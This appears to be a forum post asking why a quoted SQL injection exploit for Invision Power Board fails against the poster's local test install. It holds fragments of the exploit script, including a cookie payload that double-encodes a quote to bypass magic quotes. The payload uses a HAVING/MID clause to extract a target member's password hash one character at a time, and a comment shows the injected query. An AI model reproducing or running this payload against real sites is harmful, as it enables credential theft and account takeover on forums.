I fould this exploit for Invision power board. It shoud work till 2.0.3 version. So, I install test forum (version 2.0.3) on my localhost but I can't get it work.
- First of all does anybody get it work??
- Second I try to use this script (Of cause I correct server and file variable), didn't work I get just 0s for result.
- Is there maybe a problem with user id (I have 2 users on my test forum, I change variable id to 1), didn't work.
<= 1.3.1 Final
$server = "SERVER";
$port = 80;
$file = "PATH";
$target = 81;
/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";
/* %2527 translates to %27, which gets past magic quotes.This is translated to ' by urldecode. */
$cookie .="%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;
/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password='$pass' ORid=$target
HAVING id=$target AND MID(`password`,$i,1)='$letter' */